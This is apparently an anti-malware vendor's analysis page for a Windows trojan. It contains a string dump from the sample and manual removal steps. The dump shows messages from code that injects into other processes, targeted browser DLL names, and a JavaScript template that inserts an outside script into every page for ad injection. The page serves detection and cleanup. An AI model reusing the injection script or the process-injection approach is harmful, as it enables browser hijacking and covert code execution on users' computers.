H7S8q1miR3W19XqFxAYzqdmVaEq6XvXAVN5thLSP6sxKDaOvwogglV3Sz6yx1it3MciI06GJaaPxl50BKmIaaJWcR68U1LvMB:2uBb89VoQCYqMao6L1kFWQZCC;pABkcDTZOWmnle4h8rUJuwK;oxAorWAkkDx2E2tLAhOUp5B41fOfWXBqyljNCT0oXDmKuONVsFAtIB994R9NURTtl5;yogP2y9h3eewyXqrGklKHs1Zqmr;FQJdIwkUFfZMJ6cAmEJVnlXOLNxwo:4KK8gPD;ZIX3CMUgR8p1;be5LuMbavwV75tFJ2:C50nvuIz:eZsZoHDh1JcuTgfcr8eEPbhaQs2d0o0VclPh38NAO436iaypJBaICKF9qRYNqd8o:2HiqoWD70AqhrqAWyl1pE5KM72TSDkYTmfAAzGeOnwakVXpeMVaYLEfQ6Pn:c5WgYJ39150w6jvGIBQ1FdzAef6XznA4N0ZuvplwjDTx0rK9lcJ2:WylJd:jOyHfU4dCwCS8GmdY35JYROzAQ2fsKObB;Mh0lF7t;IPoGpB;rU;hPd:FU08w:w0P;Ywu7jwM:N30loGVbFnzfDicd1djurSixYWn6YZ0rTVRx8mDmbKZiaAVxIUQ5CPlvBMp88kT08uBgm1AynbhMRbrrd90a3YM9djHu:iI0kphTeq9KYpvYdr3YjxSYKyFArvWuWAMWbp5OfJDzq7FdrVY8OmNPMpdXgk2SyRzfR7EQ52bwtrZrpWk1mj0PACTXHAvXjUDU7VdgYlqvUSTDyQEEesMmlMA908JDec5l1e8mMO;d5DY7i4XVbpSyY63ltaLLs9PRHtmOt3hJezPRiAz:dB1mbJrMZD7k8p4OBmAA1CRXJHgxlJ3rEtYw7i0QhGj8WH0GCU1G8HjmR02CAe69NFO5mjt4TDjKTmIUJflCfblXZvj95wQ8GDNcACvAIfir9G4NptGWGpv95B0OZ7G2tMLe1CO8WPDhzJe0aTY:wzkbbz:nARH7pvi;xEZGifQryg3Wc6tS8Bug:gXIP;CZhuYWlbIU0fqjZufgkCY217s36vJLpDzotGw96z7ziewi7rjgMjoMGprYrX:7O14du9iuKfY7jcOeDVgnwDVIHuVO9GLFKZBLfDuQKFqMe:Ek;yT2839idpGwryr6sGv5N7P5pKSqgijNDkj:u6iPQW6cyWjCV7klYuUz99XplnRLf:fWhlQps8GGm3zn62dzb6Z315IOKG2x4XzrDZpgkie38bafp7Zep4ntePjvmKRdlXcI3sXvaSz0o6avcSRxZGpiCquqonO4GtwZFWqGl8IB3NauApCUQkkxWSioTGOPmY8Ti8qomDM60sZ3TftARfAXCmztmmUANhRTiJgfO2iwXvoCVsoDXeJCQxCXNkBXwA;HI4BF48S;t;AhYmjhtH8lMnenN;TDjb4kQhm76fHWrGAk6ArPKWjazCGp2PjteIEW6PnIKRVJXqCKYoWwfh1dhROPV;Ho5W8uopHs9ajMXTF1pINEsmc9CRTbItlcNfE58hJcve4XXrhwW1:ZdvO75pX0qDAB2ssOxBu7dVajNJBET3q:RauW9uCAsw00ADvL1TGmUd;tQyjXbLZW;gfOQsa8RXkPseMw8pSuW;dDaMG69QTVlPs;Fk1ZR;kMcxh8w3b6eIHS89U7rAxX9qVKMQibadhcvGy:Yh374morIdNaAZAmFsWilb1OKDXfw384DotiJD:zsGHBqczrBkaqxBw44Oq0cjBTMvX:OuRc4XuTg:N:tTtlXwkLX2d8DnoVf9Ve4w7PhSrheKkYyXtKtVOqoMDwvEBJj;;:esSR5aYGUBvslK1rlXKsOn:3waTJlatmXhj08oXk;bsFcybQM3TXY8pFv4SIbu73DnOEJzEg;D:qUpZRbCQyPTbndHHvVRI2wa9uil6y5h:JsP4jDKTcrZN4sWjPNbhP;NeaBRw7r4ROJKCS1WmrnVNITy1ZJeUWuRC1k9dWf0DVbbCDGyBYX50wxrexwZTu0RnlLJKa2xooDHSmgcc5JdP9I9mMiJZ8Ts:DzqubaPPdDRHHLUqQMWAJmsJjGhLIiDo4qBYnf:FBtp;OUsxhUBNqmUzL2AfCxfHX6rcawgY3ds85g6bMK4ZqqOSnbfxi6FPpEOOgqGGWLEYMH;S;9uJ5yEUeQ:;jgXfWp6bXY38eFnUv2KChz:1lJ1o1mctCYpAIP8;PtIN3HJFrXCupZPC;tmN6YrE5WB9Xe5rlm8;N7RzLuHeB1KTbzzevgzhiqR6frf08QCkY4I3tinWqiANMTCut4XgFO:VqDiO5igXT3c1RHSblbM;ZUMNR;gqi;6CmrbQcWOp0J1oEPvKip9xxyFyxjosDlJszJIscWfZZ2qxt4Fw;ATUOGKwwRzQMKmY7KoTpsILlPSTBChYY63ra8IE4dkjaOo5yo1OhcvInzWUqCGweKj79rIK9;RWAhwMop6GNVK4jVz5LStVrMuWBtiULH4OOwpLfLEsSYCXuly5q7:HV62gWG1TulX62ZsP9PNQlTEeetIbtC1yobcwxq6pBdYzo3F4D0Yv9QC6JKTNzfriS49E3ECcsJpu6aMXVLjUv4Qsak:a03eof3bah;Lr;g2d2WaILwn3E2EUM;0dtvbFItqnVTWjDTEDYcqrctNrU5:BWCJkjYjKlfRbwrW5gc3JANp62JhSv:zGnrgpLf53VtJnY3o6HWo;Wg5ZB:WfxuRRVfsmFi2L;aZDFCZoVV5o2VWPrmPAhoiAYVDsY7jWW6oAwshkft;smxOacox;GoIzlSVyn1aiI8TFtkRFwsX:NJG:zPXjNAZseQRvFHOUuJW;sUq8V2;iCtvU8IpbUKVlukRm5pX1I1hFKs8bZMl2rAC:C7UzMLFybU1cv9qqiIXrS5CPoa9pkL733NlSsvGonUMXBMyXPRlYZ4k8iYoTVmtXrYqJ1cBMYDClHSrgGYZ1mRo1ygYklQYvcHd1:xLdZ;;Ejrb6U9P7:IPreiBtBeaQOao6iHgj0RSGL:RS2n9nv0LX4:KI5T22N:01mpqzVid0O8ypNd1k8kGsvtx1GoFWcX0wrAa68QsiEZrXUHUr2Vsy7tNtT5:SatnkXw7vB:EEpxcyh74jnC32PJj0E0GyRLwgBUDwmXOsSSfKlnNZvu:zXUtDwO:uLecrAaYxR3ePkGhiejjgsoFjf:btLY8oKYjbbcsHJVO8707w1eT3sZpluUjlO;pekSUjEpVEicPTHATiJ1siQtG8othGJovIqztBeciAFQjeU971LX:nUZ4lz:xOxgSatSQbszo2yLdJMn3dXlhW28NYv1prRYx7ZblWWXjSL12VJzg6D4CZSwRIwSALXPuz;9IeIW2SnrOWCKL0SxUNM1FQUhBp8Gl1D43yexbqm7EuaXCUPzhSEEkBNfiPeZdUvLk3oMseCCZ:HqipS6uVN3Buolg;5mWorFWNltV3:j0lrQMoV1jW:EhONAfdWCOy0b47VLJiE8jY7X8Zuf0;Umf8BvX9ivDT8j8uQ;WtAhqKkwNS5yXuitHTvFDvAuQ1TQzLfWmNlzeE7BCIblR05AGMRdfGNHMFLLj8IlIwuK7hGvgfoGJpt9:FBaxnd;9yLDEOiP3qy:x:dP:1zrXdGN;bhFgfwjAqNrtuwhA4u81qVqbMd4L;;X0SyBiNizt9aA6K2vAMvD8F0AWiMMX6DKifxNuh:rAGT6RjdQZP0IyVuPVve2AHvZTEfDxDqIsiLz0jQYIg5gTxRWMRU55:MXLNCldKzB9uTXCfVoApIEMiqhTgmzd5cUmVnFUO9I4afNKgbmI8jNMxpDR4bk4YsceNUVzaPDNIjJyv36LKxkQPE6RG2uMmMtWH6N47IhHrd5hH2ZvWRnh0mgryDTwwymqAmIVpYWB0zICbk3Mxl6kK:fYoiYRBU7UsM8hELqvXqg7Tq;mfPk4ey5:2OHcIKuog9w8AYwSN::05uzXbxGwBK1nuBKp5M:n0rqZdxZmQUdqwLXmbTdkkQ:b1mQuMw09N9CHDYm9w58N04hQpDFdzT5xB42xQs5V0ZZ3y3zxcqJuijQIc9c9mkSDXbL;Hdigz;dJZXRJ7XZPWJHkHrSS6COQovj20crDj4L0eux8NLVXc31r0SNwjAjOoVzfd2Ck9jSqN27AsHDxz3eJ:btEn799rxMRBYusrrPsTQlKa8LbihPdZYS85onFOyOvhExL7NYAHh4NcrWGNJsQntVuQIS0ZU;FkkzQbenzbSmagU:zNMrige4hVcESk1MjQbZ5iorJ2YGPxEtDbc5xgErjJVbjsRiQqS7FhfK8APTPqSZ2bqbqXA3pXFCa0xccjde8YUxQLC3L35yvbQMcsv3UdTlNY1WD4jCUq6w:xe9sG4Ax0Jyx5d42msOKrQt9ntYk7lQFS6f9vl6um9VxW2HbC4Gl3C76P6UXAa8h8mxGZ7gbwhMPX0SS4BbVCie00mt3;xUST91FWl7k8og9Y3M4Ygk0rnMtjfZ1ixAUdFgt;L3DGckUTfXLN:3WcraARxf3RVsHug7cXrqUyRjhxKXwfqg;cGq08EggOQueaphGhNdKuhUacghOMe7bQn2nAUKbPGMdQiLLiq04r1wJX0TH2aUs6DsjBh8edmxDfH0Ye649UpHyIvDoM9jN3exeQ:5kzrh465QeWvv1oeRuqRRqtFSAF2D5TO;VPd3uRHf0QtTqZkIsLEaIWZTIVDaLAAcxaTrZ8K2mGjAwIns937EtTBz:GS1vMpQkJ:dDy;1vrgamvteQUhYrwAUii:vMH:rM5AcHTJ9LCLtlNR;owCbj96SotnCj2MnELOynTwALCuzYNil3E1EXDSE:7HdHFa1krPFsQcdWJ7pXpP3ZTkOU:Rbw6g2Tcn83EbPTGndQa98M4Ua9nTXdyGhTdgMHhgLcLoVKIx46vB9ETOBQVEnza78KQTwN4rV3aZnSpuph9e95sE4oHP;U6dXu5K8BEfFb;9zYr4ON3QYrXIi:OXTXMsfDehn0ZDcIFx7uARlXl82hd6ygXLsOzEYUBtP0joJQfVMGAy0PGphnzo5UwukVLYTKus4zXgf3J0pRSh9RsC4dBbm0lzuJxxSmAy3bP9wbhhi0TSndHzHFGLhYmReVdVzjS69MCACqSnxY9S1QWDp;LAwRW2U6rfrSD5PxaBAhffxlNd91zeKEO4jeRfxFDAakn46TFQyfDLXvBMv8VDhPO5mIK4TJU9kzM8QayEYVM21hz:5iEr4vrRx:x2oe4CQ2C2n3BFbth;7efGe8o5Xao1NXSZdRkiJEqBMDXcFky7vYNv;i1lKHATgGS3TBQ3CMvhIvW9Yag1zF4kQzUu1f2b:J2abNAxyipLbHG2U6giJVlqGSqrzVNZzR14d:7557XXDcIOCK9idR;E9BWGzCU:QTXZB0sSzxlzvcsVEQi3lHTud55xSjG:h;c;jb0eSA1iGzTQCAYNTZwPVxZrOOvQ8xCR0kBrSg8GffAGAqIV4WcyYt9jrkeUyPht6RiaroS3I6x8kqeZxJufvj8g5WcKUeEMDrYLy:rKQh;QeQp49tY5M9IMpJsHW7dJFd6Z7FlIbziYgzgRqAteamqMT8qmwjZ4DjtnQGuglDn9KxQuR0YXGSJWrg4sL7AR5gVjPP1;bGvfkNoOJvbgMSeCw65auOxkkcy3G1Zzk2RmSr5uk3DOCN;XzjmPckoy53arGtuUDt33iMlUc;66NvSyhvPiWkdUA5TxSpwSH;wYvrwPjhNoeoc1Mor;p5flLW0Qw;QT6uI4yeVwhoAQJQ;ADFfoIUbSl2rh0KXIc28LLJwdL8Yk76YmIiLMP73xGyuyjIkhz1O3c3muw40i3Tf;5J13zKdE1yu2cnFJe2vo98Y4ToqoJwNazvOAgiVtOdeqeRWn15fv8MAlAGCS7jZrmh8ELZwu2VMvW8r1DVOq2qvqup;lKQWpN8afgRldOao23dN72LWmk1XrELh;TnusEf1M9:gGoQkLBmrBGz2lzTo9oiqEe8ZwhQCRrGDVZuNC6v2it81NfUKo85Z4W9HRoCAWwIMSl0afEn0HnwmXqjtnLa3fFdNzlF3Af5CBC3fI1KPAofT7eESf6xarTPbgLQwxvTiLRpNlNw7zdnTf1N5hSok0vkBVHENstH9msHj1TtcIpaFoCq5C8:ghiTBwuPrJtYIiZuPBijwTuD8Y8:97obaUtcGKosKOaAYMYerWybxkP::Edo18dtQVi6fE8viP3odK6x:eJ8RXpyLYAFCW:1het3oxcNBIRU50m:Bq86UbYC2VgCnih3b4gTnaOJiimH9ORPqPbeSiTcPVV1NgQaIE8osCBVHc3Auxh5:m6vJJB426lNp6RU;rqfhxfDx8ebULk1o9DRhrUh6kFpANaMobGuJTyKazZufNJBHantTuamnyHo7g8n0mtBVY;u7xbc5sUWZspybqT9KK2tcQoZqmC4m:SoazaQG9tL38K4qj3b7CecEFkw6V;ju3QDz3j2I4wJ0zDUe7FTBMS2sGW1xZ0mWHiG4DK:2sy5XrQFcqDFUcQQFQi;Xnt5DqyoXd1o6ZLpm1CbTwW0O7shONtx2DCxHYYDXdvBK1dv9315b:gcv8Tbvwl24GAnet3nDBYWhE01YCmjaZ0f4c1bd5JpWj7mgU9AbaPXC0aqtUBS0E4qvyDFOfpVDa4h8I9QJzojma4sJIqQ4dFXT5rebLlJaqKHxgpJSah0mtUmjTcW9eVXaS5fcgMFjXyN;nvlMq2GkjiMEUWCydy8P7C0J:p1leNx:xTzVwDMcYvss5Byq7AAfx8nrigfCeHGD7b1wQRMjEFzKSQ9o9fsYsVKiBpf;UHKXRIC9jQHwv7IlSo5t4w6dyJg0cpfqsKFrDtdmkWS83028Wzq6YIfd3D1e8YehCVHeILBxaBMnQ85eYMmkmnEJojg9;XSATOY85EpbyFH3AAFNTSmiUQfpfUus7GZMhya5NbD7jHotfOsNGlaGvgPZaSNyyBnYu104r2b:HH3:IjCkPGGtBUeYU4AYikzC3pcwb4gZloQkX87tGVRKfN7pLU0ngqChROCFL;bAYzTyPVaBP;yRr92xXDQ1mA8HrqNJtSSvf3ufPruyLaZ5gX49jd3FFBvpMI1cGv:DSQSnZBwiekulDHSRcAYMJxtXibW6iq4CgHwwdVpszVRyLnl5i1lfA49NmhO;NpK3TUg52k3N6t458hu4FtdxkMhbl9WkC4DwdSUg2rIMZhlSd0zZIcz::uL4uNYFRrjrE4AmJMa0mCfK6XA1Rkq;;brV;4SmDFyLr7qmwJz89NNRpSRGDYsDVfvlBa5M:j2rG7YiQri71mK1lOaG4d:PyVujmNCZXMf63F1zFz9dO;Vk6XRwUgsb;eyc0wOqNPxqvItn7i:TFCucD959kBtKU1OWmIOIAXLEcMLxAWrwEFiiIb2syExPJGKqGg8aKee7uBZi8d3c2Uu4eurkxc0AcbRLg1U4Zv8ycWsY7jOcKo;6OtTVNuXsZxUJXSLUtAR4p369W8KpvFj8ZQhEulyJxudO02vfOy9woCkw0nTR8wMGPwFw7Qjjv1ee:9e;QLVgWypyTTmfT5R61vdfPNY8dI7RQJgM67NlY7e5c5atImo7R5HugO07iZxv8m9xNj68oFkJTn:z23:CKuXLk7hgCLxfV3421UnRW6LRs4YzT9WX49HCp5mtEGVXE:AZ;b0KzSLpKNGVBeI1mbVyqIQ6jPkMksJDeBn96Fo7q7KBjDVvUDHL6Y:gkJNQKx8xbD8OuoHM9HeGzVseutXL0EUb8sI9PBvVjstL2kup;UBcMDrd96ma8WkSaIRIynDhsjDwCHtu2fTY38Y0bXRngUUDgE0qIoSdTs7bcg1IxmjTRiqz4BwzjUDSWLIxml0eEwZUSkgaWlBlowojxku9OpsV3kpAZWF7zhUCwaKIy:toFqltSbNICOsFFxqJG3PbnW7FaQ:nGVD1OE5vXhgux;MCixfjKcowwvjnQ2tSLTJ;zuqAY22eL3cYP4hwNofvgTd:osSJqBfm5nE:UHXS7ZUMPUjVEzQrWxVHTwKB;cRAv3qF8jHugTRiAhj9fuOeUHI8Ki;bjVdH5TVz5BdbGAMk;d4omFAakDFYQJ4rM8kCWaOgDo27yRb:t8kbBA:yrGgjl;OgVwEbtayweyHfJiQH34R2pa7Yt9SQUzvwvDTdwKlTPQmGAIMJx1JZLf;k;bTjXII1Sdc0s8qOZf5zwSRWn;CZRhihdn2gkgZr0riryqCqiPV2SW:VwvzpZ3Lsg5PqhJA3YaF8VaTCnbPGRzE7LnuBDmmxlmMjk4YyRteyXyDcgpeWml68FZNpa1NrjL;lqFUWoit;TIEw9XgpQEJUfoHdayI1oVkTlMmKMbgPetKSvWZNe0eicktVX5wB0WbeFy3ZZ4mjiv0BuvmJQvQcWZu2QjkWpuA6Eb21CLIxSKCmrvMFB8DsnYZUcDH;a01cYvr3jnwUFSol0;GecZWiDxW;ngulcK5abowKoksjDDK;6V21I0hQDZ6zTfIS:CdJEuQSBidQXyZbGjRX:45cN24ZOT1g24sX5Uog57YfO3rkL9mHl52lsmEB26s1tCedvkWbXTxzh7Xz5J9a5Tk7b7HlplQD4BHd7LtG6lxbCFnCWpwnfZ1VnWeZ6emLidWpJJFydPza97WEBoCPHYwfIj:DWxaDYSDRMu8QgT0DzP1zzJ1TKVlDAL7NjAUdogm8ivyHItF0DNiYwuBqpZKEjHBlv6oc3DNb5fBfQsb0y6E82myFs:CLF24LPVWt6:A6fmURC6V8cmcJFjXWlB3pF27vMn1YfJG8RxDt2xJwCVfKPBapOVSqcJ3pOiaJubPc47YDwz4WUukzJKPl38UYvSep7JHQLWeFgVIGdIwDSQj;rcvzjhym:t8Q46wxdCGb3po92E3ijKW0ghl3y7rHKVpNgXLXIWtOwRSZvLPtreVO3CaF0k37Pmt;wHUrKfi;kzZUZN6tqPWmsucKYC:c500iHUIbQirLUexw3hXj3PrqUOvNSr3snZ872Ly9d0sTsW;MX6biS8bgBXZP;8lCMpoUk1aoMTST3823RB5mqu5d6ZUdiv9cnTsi3eHqyaczt5k3YNoIGNXa3b894AsglbvB5:YzST6KoC9SZ7lKRG29mONZmc:1aVVRry56fOd9CkVHbv4qLDEU2AaqOkB;xm9W1RJGNbqfAeLuBhPuJW1q5V;gBgasEnn0uVXlaNg7sGOtlsSwKio2TPOWSO4i:rluP2UDoLbswmwMjtjED5nKPaKHF0:IJjOMBExPYCoz:jU5IrVs60pCE7Haau710CxZ0pogUcwHJuT11V6D23x;ldMHBcWcTafSmPQxvoJebScBi2F9Oaja2cHDlddPPD1Qmo0mZWhiGDIt1If2KNPnmzsP7lqvztJrqZ9wxbqOkOAJ8qM:rhkeHi1q1MF5jpbJlyoZ6V5:O0C;tWsp5D4g;KQ07Nv1Zqer8DG3P2Bh9Cyu9lnGJCIEQXlz5L4SQonfN9m5PDdsLc5HeoZqLhhgg8JobRAtlZwqWUL3bQNk1ZHrJJZ2mxlRdZqHcLFT4ByBjcO5kZ4RRmNrMH0eIZbCCEntA2:rh4WLWG44j61SrIZ9fxEbRTamNPB1DkQGzZmiIMu:EEyy5rS7GHu8D0xyzJhpMjUN::hwV;vcO1tEq1osqJ:Mz3HpPZP8adEp2kjXUHDGAU;HOYNqEePyJK07:PIz1:GrGBdo98IF6c7U:vUDFNDSWhWJQb4:GHkA3mk4Pnqgsk:X2fvzlnVOiChOpmKRglWk0goqanasTVYaSKY88fkoOQFYJET1NewX1iuqs99:mjicqRYyP9tzCuy2ojkGqfqPB25LOmfGTemX2fuB70FLR3HABoOkd4Vp2mI6d2xe3DNYq7Q7Sl3as1ZdYs8AF13NFext9s3EzmoAAwFDOdsnWoeMZdB0dp2k2C9hkZ0UKj5Xy5g9NQPsQaqobM;yDuZ0bnNv:;8Wtc:Oi4hdq5:paqvEnQEVO6:WgXc8S6bHb;eFWhKe4ah44dkm7Yw7A2NLYVxKEOSJP0QEEcl9KpNx54TqZ4IAUbfTR1gjsuA0TCt3qhSzl8D3y6V2P2WwAYXQbA2pIjSiPipWObZENtLST3l3XKkdkx7UxBrqCpQUSNdN;5ETAFElHj6WHfFXz:90aF4ZvQqmv0GL0a5Jj:BllzUc8xTuE3ojpZ:2kUyM0uQn9RVhiUiqZ0L9HEeyFWjsMV7CgLvA4KPsXeXbiDEOTkzPOT1VtA3Ct4UuGfCnQfgzhcoKZ;0L0nagnH8K:VsQ5xRNP:e9oP8n1vJYVM5bjG:OuCoD76z;BHQ3sqGv1UkUQw6X4trRZdfkjRf7sLdUYcnrgz1eJJ6xOMa5TwKzKXmSMd0w:UjVJr9xCgw9vuFjPsxsKdwkiFW51XqAuSwPxKdYxo9cdYs13NvAnR:W0GTee5Knwy74V8rxa5rXtg:I78PQM;27ulGPhZ:Dq8yr;;v4:gMCLyJieEtoAg80eLwkpg6rjbkYRhz:mO8l1vDmTSLT!W!Z
%s:%d.%d|%S:%d.%d
WebStream.dll
?WebStreamInit@@YGXPAX@Z
0\0c0k0p0t0x0
;$;.;4;:;@;
0 0$04080
1 failed to ZwAllocateVirtualMemory status = %x
2 failed to ZwWriteVirtualMemory status = %x
3 failed to ZwAllocateVirtualMemory target_process_bridge_base status = %x
5 failed to ZwAllocateVirtualMemory p status = %x
4 failed to ZwWriteVirtualMemory target_process_bridge_base status = %x
5 failed to ZwReadVirtualMemory p status = %x
6 ZwWriteVirtualMemory p status = %x
7 failed to ZwProtectVirtualMemory p status = %x
7 ZwWriteVirtualMemory p status = %x
DoInjectByCreateThreadxxx failed: %x
is_targetprocess_win64 %p =%d
WaitForInputIdle ingore code=%d
NtSuspendProcess %d failed: %x
NtOpenThread %d failed: %x
NtOpenThread %d ok
NtInjectThreadByHandle failed: %x
NtResumeProcess %d failed: %x
NtTerminateProcess status: %x &&&&&&&&&&&&&&&&&&&&&
InjectProcessThreads :PID %d
NtOpenProcess %d failed: %x
C:\Users\PIAOLIU\Desktop\homepage\EIPInject\lib\EIPInject.pdb
EIPInject.dll
%d_names_%x
C:\Users\PIAOLIU\Desktop\EIPInject\lib\bridgeDll.pdb
bridgeDll.dll
7 7$7(7,7074787
9$9(9,909
@.data1
C:\Users\PIAOLIU\Desktop\EIPInject\lib\bridgeDll64.pdb
? ?$?(?,?0?4?~?
4A4X4h4
C:\Windows\xIOdJvD\b38a20ed8a675be0d249881f09a0b7a.exe
r58rH3.dll
CreatePipe
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
chrome://
chrome-devtools://
.adpro.cn
.sndo.com
googleads.g.doubleclick.net
ad2bus.cn
(function(){if( !document.body ){if( (this.loops=   this.loops||0)<40 ){setTimeout(arguments.callee, 250);}return;}if ('undefined'!=typeof(adpro_bho_jsready1)) return;adpro_bho_jsready1=true;I8zc_ifiedown=1;var script= document.createElement('script');script.src= '%s';script.type= 'text/javascript';document.body.insertBefore(script, document.body.children.item(0));})();
(function(){if( !document.body ){if( (this.loops=   this.loops||0)<40 ){setTimeout(arguments.callee, 250);}return;}if ('undefined'!=typeof(adpro_bho_jsready%d) || !top || self.location != top.location) return;adpro_bho_jsready%d=true;I8zc_ifiedown=1;var script= document.createElement('script');script.src= '%s';script.type= 'text/javascript';document.body.insertBefore(script, document.body.children.item(0));})();
<script src="%s" type="text/javascript"></script>
Disassembler->Instruction.Address == Address
Disassembler->Instruction.Length < MAX_INSTRUCTION_LENGTH
X86Instruction->SrcAddressIndex == OperandIndex || X86Instruction->DstAddressIndex == OperandIndex
!(Operand->Length & 1)
X86Instruction->OperandSize == 2
Instruction->OpcodeLength == 2 && X86Instruction->HasModRM && Instruction->OperandCount == 2
X86Instruction->OperandSize == 8
X86Instruction->OperandSize >= 4
!(Instruction->Operands[0].Flags & 0x7F)
!(Instruction->Operands[1].Flags & 0x7F)
!(Instruction->Operands[2].Flags & 0x7F)
Instruction->OperandCount == 1
!Instruction->CodeBranch.AddressOffset
Operand1->Length <= 0xFF
Operand1->Flags & OP_ADDRESS
Operand1->Type == OPTYPE_OFFSET
!(Operand1->Flags & (OP_GLOBAL|OP_FAR))
!Instruction->DataDst.Count
!Instruction->DataSrc.Count
Operand->Length <= 0xFF
Instruction->OperandCount == 1 && Operand1->Length
!(Operand->Flags & 0x7F)
>Operand->Flags & (OP_EXEC|OP_SRC|OP_DST)
>OperandIndex < 2
OperandIndex == 1
Operand->Length == 1
X86Instruction->OperandSize >= Operand->Length
(Operand->Flags & OP_EXEC) && (Instruction->Groups & ITYPE_EXEC)
(Operand)->TargetAddress
(Operand)->Length <= 8
(Operand)->Flags & OP_FAR
[!((Operand)->Flags & OP_FAR)
X86_Registers[Operand->Register]
Operand->Length
sogouexplorer.exe
twchrome.exe
mshtml.dll
chrome.dll
chrome_child.dll
webkitcore.dll
browsercore.dll
chromecore.dll
mxwebkit.dll
>xul.dll
Assertion failed: %s, file %s, line %d
user32.dll
kKERNEL32.DLL
1KERNEL32.DLL
gntdll.dll
dUSER32.DLL
Fk.DLL

b38a20ed8a675be0d249881f09a0b7a.exe_3404_rwx_6E301000_00037000:

%d:3n
GetProcessWindowStation
RtlCreateRegistryKey
zcÁ
Rp.af|
!d.cV
*.al|
WJ.ud
9V%x6*h
9"%X;VW
o9.MX<
9VW,.yP
J%xl&
Q.Ci4
}n.nd
C:\Windows\xIOdJvD\b38a20ed8a675be0d249881f09a0b7a.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
.rsrc
@.reloc
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
\DosDevices\%s
\Registry\Machine\System\CurrentControlSet\Services\%s
\??\%s
%s\%s
kernel32.dll
W%s\%x
ntdll.dll
\\.\%s
%s.bak
\\.\9wvEHUrJ2hI

svchost.exe_592:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3380

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\xIOdJvD\b38a20ed8a675be0d249881f09a0b7a.exe (2388 bytes)
    C:\Windows\gcICNI.dll (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
    C:\Windows\HODVVjX\JOuGkVG.dll (264 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Windows\euwEKPo.dll (11 bytes)
    C:\Windows\HODVVjX\yhBYqbv.dll (17806 bytes)
    C:\Windows\HODVVjX\biHrfVc.dll (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
    C:\Windows\System32\55ed1\CDClient_EX.sys (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\HODVVjX\MEdRGQmCh.tmp (12 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Windows\HODVVjX\YUrQRuLp.dll (917 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now